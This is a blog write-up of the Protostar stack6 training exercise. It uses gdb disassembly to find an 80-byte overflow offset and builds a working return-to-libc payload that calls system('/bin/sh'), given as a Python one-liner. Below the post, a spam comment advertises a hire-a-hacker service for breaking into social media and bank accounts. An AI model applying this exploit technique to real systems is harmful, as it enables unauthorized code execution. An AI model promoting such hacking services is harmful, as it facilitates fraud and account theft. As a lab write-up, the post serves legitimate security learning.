Tuesday, November 22, 2016

Exploit Exercises - Protostar Stack 6

It is free time - I had some time to play exploit-exercises. Today i play at stack level 6. I learned some experience for me, with return to lib.
Use gdb, disassembly:
#gdb -q /opt/protostar/bin/stack6 
(gdb) disas main
Dump of assembler code for function main:
:    push   %ebp
:    mov    %esp,%ebp
:    and    $0xfffffff0,%esp
:    call   0x8048484
:   mov    %ebp,%esp
:   pop    %ebp
:   ret  
End of assembler dump.
 (gdb) disas getpath
Dump of assembler code for function getpath:
0x08048484 : push   %ebp
0x08048485 : mov    %esp,%ebp
0x08048487 : sub    $0x68,%esp
0x0804848a : mov    $0x80485d0,%eax
0x0804848f :        mov    %eax,(%esp)
0x08048492 :        call   0x80483c0
0x08048497 :        mov    0x8049720,%eax
0x0804849c :        mov    %eax,(%esp)
0x0804849f :        call   0x80483b0
0x080484a4 :        lea    -0x4c(%ebp),%eax
0x080484a7 :        mov    %eax,(%esp)
0x080484aa :        call   0x8048380
0x080484af :        mov    0x4(%ebp),%eax
0x080484b2 :        mov    %eax,-0xc(%ebp)
0x080484b5 :        mov    -0xc(%ebp),%eax
0x080484b8 :        and    $0xbf000000,%eax
0x080484bd :        cmp    $0xbf000000,%eax
0x080484c2 :        jne    0x80484e4
0x080484c4 :        mov    $0x80485e4,%eax
0x080484c9 :        mov    -0xc(%ebp),%edx
0x080484cc :        mov    %edx,0x4(%esp)
0x080484d0 :        mov    %eax,(%esp)
0x080484d3 :        call   0x80483c0
0x080484d8 :        movl   $0x1,(%esp)
0x080484df :        call   0x80483a0 <_exit plt="">
0x080484e4 :        mov    $0x80485f0,%eax
0x080484e9 :       lea    -0x4c(%ebp),%edx
0x080484ec :       mov    %edx,0x4(%esp)
0x080484f0 :       mov    %eax,(%esp)
0x080484f3 :       call   0x80483c0
0x080484f8 :       leave
0x080484f9 :       ret    

Set breakpoint at call getpath and getpath+116, before return to main (overflowed)
(gdb) info breakpoints 
Num     Type           Disp Enb Address    What
1       breakpoint     keep y   0x08048500 in main at stack6/stack6.c:27
        breakpoint already hit 1 time
2       breakpoint     keep y   0x080484f8 in getpath at stack6/stack6.c:23
        breakpoint already hit 1 time
Generate paypoad, use msftool to get padding, it is 80. 
python -c 'print "A"*80+ "BBBB"'
crashed, eip point to 0x42424242, controll eip done!
When review source code, u will see code check return address not in 0xbfxxxxxxx. So to exploit it, u need use return to lib (Many tutorial use rop, i thinks it not need).
p system
p exit 
to get function address
this is payload
Set string to parameter os system function: export SHELL2='/bin/sh'. Then get this address of environment and add 7 (len("SHELL2=")=7).
| "A"*80 to fill | system() address |  exit() address | /bin/sh address |
use ;cat | stack6 trick to hold shell after open.
This is poc use environment variable: (python -c 'print "A"*80+"\xb0\xff\xec\xb7"+"\xc0\x60\xec\xb7"+"\xc8\xf6\xff\xbf"+"/bin/sh"';cat) | /opt/protostar/bin/stack6
Then, i need use /bin/sh in poc. So i choose put /bin/sh in last of poc
| "A"*80 to fill | system() address |  exit() address | /bin/sh address | /bin/sh string |
Use gdb dump, add 0x30 to real memory.
This is poc:
(python -c 'print "A"*80+"\xb0\xff\xec\xb7"+"\xc0\x60\xec\xb7"+"\xc8\xf6\xff\xbf"+"/bin/sh"';cat) | /opt/protostar/bin/stack6

Thanks for reading
Security Research
SecurityLab - Linux Lab -- Window and Cisco Lab
to be continued - I will update more.

1 comment:

Unknown said...

I thought this hacking thing was a joke until I needed someone to hack into my inheritance. I was introduced to cryptocyberhacker@gmail.com by a Friend , He hacked through my cheating husband Facebook account and Instagram dm to reveal his secrets, first he shows you proof and guarantee that your job will be done. He has helped most of my friends whose name i can't mention on here, feel free to reach him.I know a real professional hacker who has worked for me once in this past month. He is very good at hacking. He offers legit services such as clearing of bad records online without it being traced backed to you, he clones phones, hacks facebook ,instagram, whatsapp, emails, twitter, bank accounts,FIXES CREDIT REPORTS, tracks calls. He also helps to retrieve accounts that have been taken by hackers. His charges are affordable, reliable, 100% safe. Contact him via address below…
Email: cryptocyberhacker@gmail.com

Install Xposed Inspector and Frida on Genymotion

Today i had some work with android. So i need trace application. I found 2 nice tool can help me: Xposed Inspector and Frida. To setup ther...